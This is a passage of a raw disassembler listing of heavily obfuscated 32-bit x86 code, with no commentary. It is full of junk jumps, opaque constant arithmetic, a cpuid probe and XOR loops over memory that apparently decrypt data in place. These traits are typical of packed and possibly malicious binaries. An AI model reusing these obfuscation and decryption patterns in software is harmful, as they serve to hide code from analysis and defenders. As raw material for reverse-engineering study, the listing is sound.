sub edi, 7C584C33h
add edi, 88A37278h
push offset loc_4257C5
jmp loc_42BC68
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
loc_42A5B5: ; CODE XREF: _7hdaygc1:0042DEC8�j
push 0A71EE945h
pop edx
and edx, 0FD901AF7h
or edx, 0A90A3216h
add edx, 5327FEC8h
jmp loc_42A10A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F1C6
loc_42A5D2: ; CODE XREF: sub_42F1C6:loc_429352�j
jz loc_42A5DD
jmp loc_42D474
; ---------------------------------------------------------------------------
loc_42A5DD: ; CODE XREF: sub_42F1C6:loc_42A5D2�j
; _7hdaygc1:0042CECF�j
jnz loc_426BB0
mov eax, [ebp-4]
call sub_427186
jmp loc_42E200
; END OF FUNCTION CHUNK FOR sub_42F1C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_42A5F1: ; CODE XREF: sub_42DAD9-44E7�j
jmp loc_42F40D
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
loc_42A5F6: ; CODE XREF: _7hdaygc1:0042AD41�j
jle loc_42B2C2
test ecx, 0E2580985h
jmp loc_42C9B6
; =============== S U B R O U T I N E =======================================
sub_42A607 proc near ; CODE XREF: _7hdaygc1:00426551�j
; sub_42EF91+A21�p
; FUNCTION CHUNK AT 0042A126 SIZE 00000008 BYTES
xchg ecx, [esp+0]
pop ecx
add ecx, 0B5F28481h
popf
jmp loc_42A126
sub_42A607 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B265
loc_42A617: ; CODE XREF: sub_42B265-6DD8�j
add ebx, ebp
add ebx, 92456BAFh
call sub_42CD1F
loc_42A624: ; CODE XREF: _7hdaygc1:004242F5�j
pop edi
jmp loc_4293BA
; END OF FUNCTION CHUNK FOR sub_42B265
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA6A
loc_42A62B: ; CODE XREF: sub_42EA6A-562�j
jmp loc_42842F
; END OF FUNCTION CHUNK FOR sub_42EA6A
; ---------------------------------------------------------------------------
loc_42A630: ; CODE XREF: _7hdaygc1:0042B901�j
jmp loc_42D6DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42A635: ; CODE XREF: sub_42F05E-7C3B�j
cmp dword ptr [ebp-10h], 1
call sub_4246D7
loc_42A63E: ; CODE XREF: _7hdaygc1:0042FAE2�j
pop ebp
jmp loc_42E572
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_42A644: ; CODE XREF: sub_42ED2A-BC6D�j
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42A64E: ; CODE XREF: sub_4273CA+80CE�j
jmp loc_425388
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_42A653: ; CODE XREF: sub_42AA9B+282C�j
jmp nullsub_57
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
loc_42A658: ; CODE XREF: _7hdaygc1:00424020�j
jmp loc_42B41D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_42A65D: ; CODE XREF: sub_42ED2A:loc_4230AB�j
mov eax, [ebp-4]
jmp loc_4297C4
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_42A665: ; CODE XREF: sub_42B907:loc_42B695�j
pop ebp
jmp loc_428230
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
pop edi
jmp loc_42FD62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42A671: ; CODE XREF: sub_42D84A-5523�j
xor ebx, 78F0A56Fh
push 0D2E6B92h
loc_42A67C: ; CODE XREF: _7hdaygc1:loc_4288C1�j
jmp loc_42C8AE
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
shl edi, 0Ah
jmp sub_425D3F
; ---------------------------------------------------------------------------
rol esi, 16h
jmp sub_42E51C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_42A691: ; CODE XREF: sub_4269CB-846�j
sub edi, ebp
; END OF FUNCTION CHUNK FOR sub_4269CB
; =============== S U B R O U T I N E =======================================
sub_42A693 proc near ; CODE XREF: sub_42EBFB+A�p
; FUNCTION CHUNK AT 0042CDD3 SIZE 00000001 BYTES
xchg ebx, [esp+0]
pop ebx
and eax, esi
jmp loc_42CDD3
sub_42A693 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A69E: ; CODE XREF: _7hdaygc1:loc_4286A2�j
add edx, edi
rol edx, 5
push offset sub_42F979
jmp loc_424930
; ---------------------------------------------------------------------------
loc_42A6AD: ; CODE XREF: _7hdaygc1:0042E8F8�j
; DATA XREF: sub_42D5F1:loc_42456A�o
xor [ebp-8], eax
mov eax, [ebp-8]
jmp loc_42DC9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D245
loc_42A6B8: ; CODE XREF: sub_42D245:loc_42D24D�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jmp loc_429B19
; END OF FUNCTION CHUNK FOR sub_42D245
; =============== S U B R O U T I N E =======================================
sub_42A6C3 proc near ; CODE XREF: sub_425E64+46F6�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004263B7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004267CF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426F78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428A58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DE95 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E2B1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042EB6D SIZE 00000012 BYTES
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
push 9F5E16ECh
jmp loc_428A58
sub_42A6C3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_42A6D3: ; CODE XREF: sub_42C26B-8627�j
add esp, 8
xor eax, [esp-8+arg_4]
xor edx, [esp-8+arg_8]
add esp, 8
and eax, 0FFh
xor edx, edx
mov edx, ds:dword_42BC60
jmp loc_426BE7
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42A6F3: ; CODE XREF: sub_424F62+7FD9�j
xor [esi], ebx
add [esi], edx
xor [esi], ecx
push esi
jmp loc_429F2F
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
loc_42A6FF: ; CODE XREF: _7hdaygc1:loc_42DBF1�j
jz loc_42BBE8
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42A705: ; CODE XREF: sub_423DFC:loc_426A10�j
jmp loc_42A348
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
add ebx, 0D693C0BCh
and eax, 30F0589Dh
or ebx, 0B3A19F59h
jmp loc_42BBE6
; ---------------------------------------------------------------------------
loc_42A721: ; CODE XREF: _7hdaygc1:loc_42E1B8�j
xor eax, 1BB02768h
add eax, ebp
add eax, 0F0FC9E49h
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42A72F: ; CODE XREF: sub_424CE0+5288�j
push 98A40EC7h
jmp loc_42AE4A
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_42A739: ; CODE XREF: sub_42F8C4:loc_42C87E�j
add edi, ebp
call sub_42DE6F
; END OF FUNCTION CHUNK FOR sub_42F8C4
; START OF FUNCTION CHUNK FOR sub_42C6FB
loc_42A740: ; CODE XREF: sub_42C6FB-8BAE�j
jmp loc_425AAF
; END OF FUNCTION CHUNK FOR sub_42C6FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E9C
loc_42A745: ; CODE XREF: sub_424E9C:loc_42BA5A�j
jg loc_4244B0
jmp loc_426E56
; END OF FUNCTION CHUNK FOR sub_424E9C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42A750: ; CODE XREF: sub_42F65A-D82�j
jp loc_428B78
jnz loc_424A4B
and esi, 961F3662h
loc_42A762: ; CODE XREF: _7hdaygc1:loc_42FB7E�j
adc ecx, ebp
loc_42A764: ; CODE XREF: sub_42F65A:loc_429BFC�j
push 0B0BB42A9h
pop eax
xor eax, 8208C1CCh
jmp loc_42D061
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E51C
loc_42A775: ; CODE XREF: sub_42E51C-1E62�j
call sub_42A104
pop ecx
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_42E51C
; START OF FUNCTION CHUNK FOR sub_42C6A0
loc_42A77E: ; CODE XREF: sub_42C6A0:loc_423CC7�j
; sub_42E51C-1E6C�j ...
mov eax, [ebp-20h]
jmp loc_42A0F2
; END OF FUNCTION CHUNK FOR sub_42C6A0
; ---------------------------------------------------------------------------
locret_42A786: ; CODE XREF: _7hdaygc1:loc_42DBD6�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42A787: ; CODE XREF: sub_42F65A-2DB1�j
jmp loc_4248FC
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42A78C: ; CODE XREF: sub_42AA47+E�j
jmp loc_4238F6
; END OF FUNCTION CHUNK FOR sub_42AA47
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_42A792: ; CODE XREF: sub_42742E+7E44�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_42A797: ; CODE XREF: sub_423A34+8�j
jmp loc_42CC5D
; END OF FUNCTION CHUNK FOR sub_42F8DB
; ---------------------------------------------------------------------------
lea eax, [ebp-18h]
call sub_42C16F
mov eax, [ebp-1Ch]
push eax
push edi
push 0AC30165Eh
and edi, ebx
jmp loc_42E9CB
; ---------------------------------------------------------------------------
loc_42A7B5: ; DATA XREF: sub_427248+3763�o
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
push 0AE9577Fh
pop eax
or eax, 7CB0A88Dh
xor eax, 3F34E57Eh
jmp loc_42B8AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42A7D4: ; CODE XREF: sub_425E64:loc_427CA4�j
jl loc_426ECD
loc_42A7DA: ; CODE XREF: sub_425E21+93A0�j
jmp loc_42BABB
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A7DF: ; CODE XREF: sub_42E283-4DE�j
jmp loc_429AB5
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
sbb ecx, 7F7EC9F2h
jmp loc_426EC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42A7EF: ; CODE XREF: sub_42911B:loc_42E7BC�j
xchg ebx, [esp+8+var_8]
jmp loc_428287
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
loc_42A7F7: ; CODE XREF: _7hdaygc1:0042EE6B�j
sub edi, 0DC0C3A8h
add edi, 2E060799h
xchg edi, [esp]
jmp sub_42C1AF
; ---------------------------------------------------------------------------
loc_42A80B: ; DATA XREF: sub_42E0C4-574B�o
push 0A0999B07h
pop ebx
add ebx, 0D2F8CA78h
or ebx, 22ABA95h
test ebx, 80h
jmp loc_42F9C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42A828: ; CODE XREF: sub_42AA07:loc_429D16�j
jnz loc_424BDD
jmp loc_42C7EE
; END OF FUNCTION CHUNK FOR sub_42AA07
; =============== S U B R O U T I N E =======================================
sub_42A833 proc near ; DATA XREF: sub_425E64+5C61�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423000 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004244F2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042609D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E5B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004298AC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042A86E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B1D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C938 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E9B2 SIZE 0000000A BYTES
pop ebp
mov eax, ds:dword_42BC48
or eax, eax
jnz loc_4244F2
jmp loc_42C938
sub_42A833 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4296C2
loc_42A847: ; CODE XREF: sub_4296C2+12�j
rol esi, 0Eh
add esi, 3C28C6Eh
xchg esi, [esp+0]
jmp sub_426CBB
; END OF FUNCTION CHUNK FOR sub_4296C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42A858: ; CODE XREF: sub_4237DA:loc_42316D�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-0Ch], eax
xor eax, eax
jmp loc_42B7A0
; END OF FUNCTION CHUNK FOR sub_4237DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_42A86E: ; CODE XREF: sub_42A833-29D0�j
jmp loc_4298AC
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB9F
loc_42A873: ; CODE XREF: sub_42AB9F+F�j
pop eax
or eax, 1C768861h
rol eax, 1Eh
xor eax, 0BD1280DBh
rol eax, 0Fh
jnb loc_429A9C
; END OF FUNCTION CHUNK FOR sub_42AB9F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4252C8
loc_42A88D: ; CODE XREF: sub_4252C8+8FE�j
jmp nullsub_33
; END OF FUNCTION CHUNK FOR sub_4252C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42A892: ; CODE XREF: sub_42F05E-7C52�j
; sub_42F05E-7C45�j
jb loc_42B16F
; END OF FUNCTION CHUNK FOR sub_42F05E
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42A898: ; CODE XREF: sub_42A052:loc_426417�j
push offset sub_42BAE7
jmp loc_423B7E
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42A8A2: ; CODE XREF: sub_429318:loc_42FD46�j
pop ecx
sub ecx, 0D95C605Ch
xor ecx, 76541948h
add ecx, 0F3BC56AFh
xchg ecx, [esp+4+var_4]
push ebp
jmp loc_429830
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_42A8BE: ; CODE XREF: sub_42F8C4+10�j
rol edx, 5
push esi
push 0C1781BCFh
pop esi
and esi, 0B3865CCFh
xor esi, 0D9FD5D9Bh
jmp loc_426C2C
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A8D9: ; CODE XREF: sub_42E283+D�j
test al, al
jz nullsub_83
jmp loc_42528E
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42A8E6: ; CODE XREF: sub_42AFFE-1D1F�j
jnz loc_4292FB
add ebx, 29FA7AEAh
and eax, ecx
xchg ecx, ebx
jmp loc_4292FB
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A8FB: ; CODE XREF: sub_42E283-1F21�j
add edx, [ebp-0Ch]
add eax, edx
mov [ebp-8], eax
mov eax, [ebp-8]
push ecx
mov ecx, ebp
xchg ecx, [esp+0]
jmp loc_42E53D
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42A911: ; CODE XREF: sub_425C3B+72EA�j
sbb ecx, 38D7EDB9h
xchg ecx, [eax]
loc_42A919: ; CODE XREF: sub_425C3B:loc_42CF16�j
sub esi, 98364879h
add esi, 146F1AF2h
popf
xchg esi, [esp+0]
jmp loc_427D07
; END OF FUNCTION CHUNK FOR sub_425C3B
; =============== S U B R O U T I N E =======================================
sub_42A92E proc near ; DATA XREF: _7hdaygc1:0042544F�o
; FUNCTION CHUNK AT 0042322F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004249FC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426A1D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004271C2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428BE5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B255 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C4B4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C59C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042CA83 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042ED9E SIZE 00000028 BYTES
or eax, eax
jnz loc_428BE5
jmp loc_4249FC
sub_42A92E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jb loc_42C884
cmp ebp, 56364F07h
jmp loc_42D9F2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A94C proc near ; CODE XREF: sub_425C3B:loc_42312E�j
; sub_42C7F3-85EE�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042FD92 SIZE 0000000D BYTES
push ebp
mov ebp, esp
js sub_42CC45
add esp, 0FFFFFFF4h
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
jmp loc_42FD92
sub_42A94C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB0D
loc_42A963: ; CODE XREF: sub_42EB0D:loc_423D65�j
pop ebx
or ebx, 0E148CF7Ch
rol ebx, 1Fh
add ebx, 4032F8BCh
rol ebx, 2
jmp loc_4248D5
; END OF FUNCTION CHUNK FOR sub_42EB0D
; ---------------------------------------------------------------------------
loc_42A97B: ; DATA XREF: sub_42E076-8CA1�o
xchg esi, [esp]
push 5AE29E02h
pop edi
xor edi, 1910E332h
and edi, 0D4F4571Ch
rol edi, 1Bh
or edi, 9A321222h
jmp loc_42400E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427248
loc_42A99E: ; CODE XREF: sub_427248+8A26�j
mov eax, 80000003h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
push offset loc_42A7B5
jmp nullsub_200
; END OF FUNCTION CHUNK FOR sub_427248
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A9B5: ; CODE XREF: sub_42E283:loc_42EB52�j
sub edx, 431467CBh
rol edx, 7
call sub_42AE0B
; END OF FUNCTION CHUNK FOR sub_42E283
; START OF FUNCTION CHUNK FOR sub_428342
loc_42A9C3: ; CODE XREF: sub_428342+6�j
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_428342
; ---------------------------------------------------------------------------
shl ecx, 10h
jmp sub_42AD16
; ---------------------------------------------------------------------------
loc_42A9D0: ; CODE XREF: _7hdaygc1:0042320F�j
not eax
loc_42A9D2: ; CODE XREF: _7hdaygc1:loc_42ABB3�j
pop ecx
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42A9D3: ; CODE XREF: sub_42C443+B32�j
pop ecx
xchg ecx, [esp-4+arg_0]
mov ebp, ecx
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_42A9DB: ; CODE XREF: sub_42ED2A+19�j
jmp loc_4230A3
; END OF FUNCTION CHUNK FOR sub_42ED2A
; =============== S U B R O U T I N E =======================================
sub_42A9E0 proc near ; CODE XREF: sub_428A2D+7�j
; sub_42B4F9+3�p
push ebp
jmp loc_42DCE2
sub_42A9E0 endp
; ---------------------------------------------------------------------------
loc_42A9E6: ; CODE XREF: _7hdaygc1:0042979A�j
test eax, ecx
jmp loc_42405D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_42A9ED: ; CODE XREF: sub_425C2C-1CF3�j
jbe loc_426826
jg loc_42FD36
xchg esi, edi
push edx
jmp loc_426E43
; END OF FUNCTION CHUNK FOR sub_425C2C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42AA02: ; CODE XREF: sub_428B11:loc_4295DA�j
jmp nullsub_212
; END OF FUNCTION CHUNK FOR sub_428B11
; =============== S U B R O U T I N E =======================================
sub_42AA07 proc near ; CODE XREF: _7hdaygc1:loc_423E6B�p
; sub_4240B0:loc_425EB7�p ...
; FUNCTION CHUNK AT 004231C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004231EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423B34 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424BDD SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00425423 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042621E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426666 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427149 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427351 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00427E27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429D0E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A52C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A828 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B625 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042B886 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C7EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C9FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FAE7 SIZE 0000000C BYTES
call sub_42E4B2
loc_42AA0C: ; CODE XREF: _7hdaygc1:00429961�j
jmp loc_427351
sub_42AA07 endp
; =============== S U B R O U T I N E =======================================
sub_42AA11 proc near ; CODE XREF: sub_424DF3-1312�p
; _7hdaygc1:00428038�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424454 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042912C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B995 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E8B3 SIZE 00000005 BYTES
xchg ecx, [esp+4+var_4]
pop ecx
xchg ebx, [esp+0]
mov edi, ebx
jmp loc_42B995
sub_42AA11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AA1F: ; CODE XREF: _7hdaygc1:0042C658�j
cmp edi, 4FF99840h
jmp loc_426B40
; ---------------------------------------------------------------------------
loc_42AA2A: ; CODE XREF: _7hdaygc1:004260DF�j
lea eax, [ebp-14h]
push eax
push 281F84AAh
pop eax
add eax, 658E428h
xor eax, 0B094F549h
jmp loc_42F70A
; ---------------------------------------------------------------------------
loc_42AA45: ; CODE XREF: _7hdaygc1:0042C8CC�j
mov [esi], eax
; =============== S U B R O U T I N E =======================================
sub_42AA47 proc near ; CODE XREF: sub_424AE1+42EC�p
; FUNCTION CHUNK AT 0042346F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004238F6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423B83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042492A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004249A1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424D04 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004250B3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00425E36 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042684D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00429730 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00429A39 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042A78C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF1E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B6E3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042BFB9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C439 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D619 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E77E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F192 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042F4A7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042F5AC SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
cmp dword ptr [ebp-10h], 0
jl loc_42F192
jmp loc_42A78C
sub_42AA47 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_428994
loc_42AA5F: ; CODE XREF: _7hdaygc1:0042E01D�j
jmp sub_426CBB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42AA65: ; CODE XREF: _7hdaygc1:0042ADA2�j
jmp loc_424870
; ---------------------------------------------------------------------------
sub edi, ebx
jmp sub_426471
; ---------------------------------------------------------------------------
loc_42AA71: ; DATA XREF: sub_4291A3:loc_429511�o
mov edx, 0E5254649h
call sub_42C763
push offset loc_425BE8
jmp locret_426F77
; ---------------------------------------------------------------------------
mov ds:dword_42BC58, eax
call sub_428C3B
dec eax
mov edx, ds:dword_42BC58
jmp loc_42DC63
; =============== S U B R O U T I N E =======================================
sub_42AA9B proc near ; CODE XREF: sub_424DF3:loc_423AD5�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00423304 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004233A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425411 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004261F4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004271C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428983 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00429A0A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042A653 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CEE2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D2C2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D7AF SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042ED11 SIZE 00000019 BYTES
add esp, 0FFFFFFF8h
push ebx
mov [ebp-4], eax
jmp loc_429A0A
sub_42AA9B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42AAA7: ; CODE XREF: sub_423172+BD13�j
add eax, 33394E03h
add eax, ebp
add eax, 486691D5h
mov ecx, 0F8h
call sub_42A94C
mov edx, [ebp-4]
lea eax, [ebp-14h]
mov ecx, 0F8h
jmp loc_424C01
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C369
loc_42AACF: ; CODE XREF: sub_42C369+D�j
cmp dword ptr [ebp-0Ch], 0
jg loc_427276
loc_42AAD9: ; CODE XREF: _7hdaygc1:004248B3�j
; _7hdaygc1:00427270�j ...
mov eax, [ebp-4]
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_42F442
; END OF FUNCTION CHUNK FOR sub_42C369
; ---------------------------------------------------------------------------
cmp eax, 54660A96h
jmp loc_426211
; ---------------------------------------------------------------------------
loc_42AAF2: ; DATA XREF: sub_42AE9C:loc_42B716�o
mov ebp, esp
push ecx
push offset sub_4263F9
jmp loc_42CA90
; ---------------------------------------------------------------------------
